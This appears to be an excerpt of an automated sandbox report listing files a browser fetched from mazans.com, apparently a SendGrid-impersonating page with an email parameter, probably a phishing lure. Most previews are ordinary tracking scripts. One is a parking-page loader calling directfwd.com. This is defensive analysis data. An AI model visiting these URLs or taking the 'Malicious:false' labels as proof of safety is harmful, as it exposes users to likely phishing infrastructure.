                                                                                                                                                                                                                                                                                                                                                                          SHA-512:58BC4AFF427CA553476156A926EE4C42E1A9F349051FE7FF45431C9D0FDF795951899BCF78BDF8746CD2A81D62F265DB9DCE474D2CF18A7E4654D4C6FD23FD03
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"error":"FILE_NOT_FOUND"}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 495556
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):127714
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997748657520571
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:1mQ0sKTBHDS4l0qbiN731E8+6wFqxDvpHwwK:x0THD5O7OiyqjQF
                                                                                                                                                                                                                                                                                                                                                                          MD5:D7B0F8E4446C8B2519AE2DF84D5228FC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:439B0BA98448EE1BDCAA9EB2C092B20352C064CB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:90C2A4B1BE50A2241D879CA7105EB955F028584DEAE636E0333AA6327B28CD33
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:50C8FB5E99A76DE4EFDA90DDD7624B8C52D1BF22940BBB630FB12639BBC2A3645A8715CCACB6A43B5BEEAC345DAF7A5780DB7FDF2A9C2006A45FC9FEE5B13884
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:............^...(..<...p..(...Z.+C..fk...4#..P.......7.2.6O2........3...bJ.FfFFFDFD^...Z.xmg.Et.%E...>.G....<............+...^{9...L..._..w.z.<+..."N..<.|J.3..d..!m.6Ns.g.......<Nr6..x4...'C..;.J....,.....e..k?|.......@./.Gl/......]...=6..!.'s..x...2.R.6..RB..._ ......\Yy.z%...k{...^....q..V.J.;.].r...`[..S..\.Q.2.!.....?.eg......X>8..!LFz.K........+.......q.m.Erv^.f..^.gya....2....^..rp....f^.....,.&.....K\....Q2x..v:........l0..G...2O..X.gE.kO.1+........5 ~2..Z._...(.[B.'..7...B..".>..A>..Qlo<..vT+.....n.4K./..6..+...*.uh"...t..........~....^....%..,..d..6ya..}-...$....|@..@...Z....ki.27....|-....|W.Y......t.. a...r.I/Y.....2....YyL.$.....0...j....-;..`f`.^%.sT.U...`...8..1Hc.;.U~...q:@2.5w..q8..<.u......*9....\.5....$v.$......6..6..Jo.pa.a...."B.)...!...A.I.H....&.49...zW.k`. ......J.q>T--.._.,.....T.,+.....N..q6...a..&6..1........,.fv...6.....4w.j...)>...l.-...2.......2...J.L....x\,;....W;i>5.(\.*..E...Y.*. .p..E....`.....$.RD.>...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (606)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11133
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.520280429902031
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:aCrC821ch80emIm9Db2M4GqZQ0M7jLQn2RC6yQEU+9my8M8iJAP3A/pFd0Pa9Sl4:aC2VzmX2TGeQj7Ha2RahU+9my8M8iJ3/
                                                                                                                                                                                                                                                                                                                                                                          MD5:EA7826F34518D7C2295738F39C7640FA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0095729B4BC2A580E4CE033993DAFE498DB87DF5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:68CC280CE370C6F1F51A4FC5950103FC38DF80A429552C549ADD04EBD8BD3A23
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E371BB3BAB334509BAA629DE564D37EBC7CA3CDDF059E33FE394A90856394AB318B26133D10BF9D3E47D83449F3C8242724C7850F58DC94A8F834666ACECD321
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://munchkin.marketo.net/163/munchkin.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: 163 r896. */. (function(l){if(!l.MunchkinTracker){var h=l.document,p=h.location,C=encodeURIComponent,y=!1,q=null,t=null,D=!1,v=null,E=[],u=function(b,a,c,d){try{var e=function(){try{c.apply(this,arguments)}catch(a){}};b.addEventListener?b.addEventListener(a,e,d||!1):b.attachEvent&&b.attachEvent("on"+a,e);E.push([b,a,e,d])}catch(f){}},U=function(b,a,c,d){try{b.removeEventListener?b.removeEventListener(a,c,d||!1):b.detachEvent&&b.detachEvent("on"+a,c)}catch(e){}},e=function(b){return"undefined"!==typeof b&&null!==.b},F=function(b,a){return b.className.match(RegExp("(\\s|^)"+a+"(\\s|$)"))},V=e(l.XMLHttpRequest)&&e((new l.XMLHttpRequest).withCredentials),s=function(b){var a=null,c;if(e(b))if(0===b.length)a="";else try{a=decodeURIComponent(b)}catch(d){c=b.indexOf("?");if(-1!==c)t
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):41172
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                                                                                                                                                                                          MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (544)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9860
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.123340935053152
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:mMwkO4r/QfRXJO1DU7lKBtFAXpg1eh84C:mMSA4fRXJHlKvFAXpg1eh84C
                                                                                                                                                                                                                                                                                                                                                                          MD5:EDCCD7502A75ADE3B500AC4CDE53D109
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9CC3C307F4D85F2206F1DA0B7D0EF392132B7A8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:70D36C05FA547E2BB815E656C3DE0297A9B7FEECF23E9EB693BE86F4818E2EEF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:87BE358113FE75348854168888108C7021CC0AB4B1E59223274FE29A64573AFAC9EA60E4177FE24C2E8288F27FAD0A0CEB96BFD22BC1094B1C2C4B17AF348666
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. Quantcast measurement tag. Copyright (c) 2008-2022, Quantcast Corp..*/.'use strict';(function(a,r,p){var t=function(d){var e=p.createElement("a");e.href=d;return e},u=[/^http[s]?:\/\/((adservice.google.*)|([^\/]*fls\.doubleclick\.net))\/.*~oref=(?<url>[^;\n]*)/,/^http[s]?:\/\/[^\/]*tealium.*\/.*page_url=(?<url>[^&]*)/],v=function(){if(r.top!==r.self){try{for(var d=0;d<u.length;d++){var e=p.location.href.match(u[d]);if(e&&e.groups.url){var h=decodeURIComponent(e.groups.url);break}}}catch(f){}return h?t(h):t(p.referrer)}return p.location},w=function(d){return d.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,."")},x=function(d){return{}.toString.call(d).match(/\s([a-zA-Z]+)/)[1].toLowerCase()},y=function(d,e,h){return d?"nc"===d?!e||!h||0>e.indexOf(h):"eq"===d?e===h:"sw"===d?0===e.indexOf(h):"ew"===d?(d=e.length-h.length,e=e.lastIndexOf(h,d),-1!==e&&e===d):"c"===d?0<=e.indexOf(h):!1:!1},g=function(d,e,h){var f=v().href;y(e,f,h)?d(f):d(!1)},c=function(d,e,h){var f=v().pathname;y(e,f,h)?d
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):244375
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4541358501238815
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713EN:pfLeYc+PJxH8NNfFcrHurPK713C
                                                                                                                                                                                                                                                                                                                                                                          MD5:98A1AA6D0155EA8597C93CD050CE5808
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C844C1CBAA79A4F09F50E2DF3F648B8B5AA6CB5E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:527BF3DACC5EB62211130FE4BF315C682861320AB25B4AA2EFE6EA87A760DB8C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BB01621E0CBE1185D2167CEDB9517A29FE6537AE0E23254243DF90F36A66A0E1D91034E9A772E76C94FC1E1E969DB9082177777EC6085A752B3BCB9BC8B98BC2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):37
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.040403544317301
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXEcyv+L1pse:J/se
                                                                                                                                                                                                                                                                                                                                                                          MD5:3EACD0132310EA44CAD756B378A3BC07
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E2216A7E9B73F5CB0279351C78CE61C33475CEA7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BB229A48BEE31F5D54CA12DC9BD960C63A671F0D4BE86A054C1D324A44499D96
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BD9AB35DDE3A5242B04C159187732E13B0A6DA50DDCFF7015DFB78CDD68743E191EAF5CDDEDD49BEF7D2D5A642C217272A40E5BA603FE24CA676A53F8C417C5D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://heapanalytics.com/h?a=1541905715&u=6112782573225535&v=2199469863289764&s=5313631937644667&b=web&tv=4.0&z=0&h=%2FWEB-ID-6672849687924%2Fzerobot%2F&q=%3Femail%3DEMAIL_REDACTED&d=mazans.com&t=Page%20not%20found%20%7C%20SendGrid&r=https%3A%2F%2Fsepedatua.com%2F&k=Device%20screen%20resolution&k=1280%20x%201024&k=Inner%20window%20dimensions&k=1280%20x%20907&ts=1731515354042&srp=cs%3A84712%252F392b47b9-fdc5-a91a-dc6e-b9b5c392f625%252F1%252F1%252F2520&cspid=84712&cspvid=1&cssn=1&csts=2520&csuu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&ubv=117.0.5938.149&upv=10.0.0&sch=907&scw=1280&st=1731515359048&lv=4.23.4&ld=cdn.heapanalytics.com
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.......!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4646
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.9249002038545004
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:9J4o/vHtcSLLYJcGSwE63Gxdj3Vh+tQLRcya5aijo:T1vHxYJvSwESGxt3Vh+tQLR1eaijo
                                                                                                                                                                                                                                                                                                                                                                          MD5:424A02CCFAF5B1F899AD27BA9EF83409
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4B3EBB85E87BD879B620163B5D702C9D4C3FD069
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AFC84F9B2618065E51F3C6F3E1D8749B0E5C6E86649FF0E72B2C5B636CFE114A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:677235017E856F06582C054D418680F5D5857B4CB055371E32D0B952D8C29A33C6D34FA34054CF1BE073A08E0C595D9D04836524C5C2FEB9F2E0E50142EC54FA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://rum.hlx.page/.rum/@adobe/helix-rum-js@%5E2/src/index.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. * Copyright 2024 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */./* eslint-env browser */.export function sampleRUM(checkpoint, data) {. // eslint-disable-next-line max-len. const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime);. try {. window.hlx = window.hlx || {};. sampleRUM.enhance = () => {};. if (!window.hlx.rum) {. const param = new URLSearchParams(window.l
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://q.quora.com/_/ad/cf2e820d0783422eb948ed96d7ff680b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):583
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.129258967489751
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3Bg+W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJhg+P4NjSK
                                                                                                                                                                                                                                                                                                                                                                          MD5:51618AC2B7CF5C4937213E965C00F20A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7E704E57162ED18743BEF9F95E2DEA558954751B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0B41F69E6564B9C89B1B344744C5B06EB4ADC0E584028909286D2B936E1AFED5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D07AF4309BF8156644D604676EEC62CF78128DAE1CD1808E865E02BF7302B3DEA5B1EDA42EECD6E8687C84B85A6A52C07BD45B120B8FE5940D8D80586A2D0FB0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://mazans.com/https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-65e4613a26158083e3e99e53ac7ff36f-lc.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9POBEX80W";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1876)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):96983
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2956057406448735
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:GfUyDpPtfE6/615M6xKGUjrFCGFBKP+aoa3emdEyAF2sO+zhLsK5sJ:gnE6C1G6xKLpBKWaJem0KJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:52A7A7C0298D65E67882A2B45D8F99BB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C8EDEBD14AC0A5604DFC0D559C5878832453B578
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0C47080FEB6FE854CB361DC2471F19799E8773617F10E33CF78AEA069D41A4E6
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:66AA00E04AD2762F359B413E283D3E27A3036BD6F25F2D011BB69CC56A907123292657F3AB4FC1594BFA7B193085BE78574F029618B5ADC6E413907FDA762B86
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:function _truste_eu(){function u(){var g=truste.eu.bindMap;g.feat.isConsentRetrieved=g.feat.crossDomain?g.feat.isConsentRetrieved:!0;if(!u.done&&truste.util.isConsentResolved()){u.done=!0;var k=function(){var a=(new Date).getTime(),c=truste.util.readCookie(truste.eu.COOKIE_REPOP,!0),d=truste.eu.bindMap.popTime;return d&&d!=c&&a>=d}();k&&(g.feat.dropPopCookie=!0);truste.eu.ccpa.initialize();truste.eu.gpp.initialize();truste.eu.gpcDntAutoOptOut();truste.eu.gcm();var a=function(){var a=truste.eu.bindMap;.if(a.feat.consentResolution){var c=truste.util.readCookie(truste.eu.COOKIE_GDPR_PREF_NAME,!0);if(c&&(c=c.split(":"),!RegExp(a.behavior+"."+a.behaviorManager).test(c[2])&&(/(,us|none)/i.test(c[2])||"eu"==a.behaviorManager&&/implied.eu/i.test(c[2]))))return!0}return!1};truste.util.fireCustomEvent("truste-cookie",g.prefCookie);truste.eu.isGPCDNTEvent()?g.feat.dntShowUI&&"expressed"==g.behavior&&truste.util.executeOnCondition(function(){return g.prefCookie||g.feat.gpp.gppApplies&&null==truste
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2228
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                                                                                                                                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):726
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.855795869039044
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12:YyNALv2i47S1HAxU823XheXoIFFQbSJN1Kvu6exBA9QmA9abcA9FXQEBaeo4czgr:YyN0e7swU82nhIISJLKcxBYQmY7YFBoa
                                                                                                                                                                                                                                                                                                                                                                          MD5:B78F37C2B9D6DAE1A4E8AA118B9B553F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:23E99D683AA72B0F0785AD9E860974A63E8C58F4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:12A015D3B6EF4084B854C1A2601F511E2A843B8015992A4F9DCFFC20D699FB85
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D74E2D2D368AEC1F97A1CE2394D28EA789175DE78CB17D87F5013A1C42D407C8B22A65FB8F3111CD71647106672713175842B6F70749E02496BBD2D4E8EE6967
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
